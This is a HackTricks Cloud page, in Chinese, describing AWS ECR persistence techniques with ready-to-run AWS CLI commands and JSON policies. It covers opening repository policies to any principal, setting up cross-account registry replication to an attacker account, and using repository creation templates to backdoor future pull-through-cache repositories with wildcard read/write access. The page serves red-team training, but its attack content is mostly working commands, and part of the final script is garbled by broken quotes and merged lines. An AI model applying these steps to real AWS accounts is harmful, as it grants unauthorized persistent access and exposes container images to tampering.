HackTricks CloudAWS - ECR 持久化
Tip
学习并练习 AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 subscription plans!
- 加入 💬 Discord group 或者 telegram group 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud github 仓库 提交 PRs 来分享 hacking tricks。
ECR
有关更多信息,请查看:
隐藏的 Docker 镜像(包含恶意 code)
攻击者可以上传一个包含恶意 code 的 Docker 镜像到 ECR 仓库,并利用它在目标 AWS 账户中维持持久性。攻击者随后可以以隐蔽方式将该恶意镜像部署到账户内的多个服务,例如 Amazon ECS 或 EKS。
仓库策略
向单个仓库添加一个策略,授权你自己(或任何人)访问该仓库:
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
Warning
注意 ECR 要求用户拥有 权限 去通过 IAM 策略调用
ecr:GetAuthorizationTokenAPI,在他们能够认证之前,才能对注册表进行认证并从任何 Amazon ECR 存储库推送或拉取任何镜像。
注册表策略 & 跨账户复制
可以通过配置跨账户复制自动在外部账户中复制注册表,你需要 指定要复制注册表的外部账户。
.png)
首先,你需要使用如下 注册表策略 授予外部账户对该注册表的访问权限:
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
然后应用复制配置:
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
Repository Creation Templates(为未来仓库设置前缀后门)
滥用 ECR Repository Creation Templates,自动为 ECR 在受控前缀下自动创建的任何仓库植入后门(例如通过 Pull-Through Cache 或 Create-on-Push)。这可以在不修改现有仓库的情况下,持久地对未来仓库授予未授权访问。
- 所需权限:ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy(由模板使用),iam:PassRole(如果模板附加了自定义角色)。
- 影响:在目标前缀下创建的任何新仓库会自动继承攻击者控制的仓库策略(例如跨账户读/写)、标签可变性和扫描默认设置。
在选定前缀下为未来 PTC 创建的仓库植入后门
```bash # Region REGION=us-east-11) Prepare permissive repository policy (example grants everyone RW)
cat > /tmp/repo_backdoor_policy.json <<‘JSON’ { “Version”: “2012-10-17”, “Statement”: [ { “Sid”: “BackdoorRW”, “Effect”: “Allow”, “Principal”: {“AWS”: “*”}, “Action”: [ “ecr:BatchCheckLayerAvailability”, “ecr:BatchGetImage”, “ecr:GetDownloadUrlForLayer”, “ecr:InitiateLayerUpload”, “ecr:UploadLayerPart”, “ecr:CompleteLayerUpload”, “ecr:PutImage” ] } ] } JSON
2) Create a Repository Creation Template for prefix “ptc2” applied to PULL_THROUGH_CACHE
aws ecr create-repository-creation-template –region $REGION –prefix ptc2 –applied-for PULL_THROUGH_CACHE –image-tag-mutability MUTABLE –repository-policy file:///tmp/repo_backdoor_policy.json
3) Create a Pull-Through Cache rule that will auto-create repos under that prefix
This example caches from Amazon ECR Public namespace “nginx”
aws ecr create-pull-through-cache-rule –region $REGION –ecr-repository-prefix ptc2 –upstream-registry ecr-public –upstream-registry-url public.ecr.aws –upstream-repository-prefix nginx
4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)
acct=$(aws sts get-caller-identity –query Account –output text) aws ecr get-login-password –region $REGION | docker login –username AWS –password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest
5) Validate the backdoor policy was applied on the newly created repository
aws ecr get-repository-policy –region $REGION –repository-name ptc2/nginx –query policyText –output text | jq .
</details>
> [!TIP]
> 学习并练习 AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>支持 HackTricks</summary>
>
> - 查看 [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **加入** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) 或者 [**telegram group**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库 提交 PRs 来分享 hacking tricks。
>
> </details>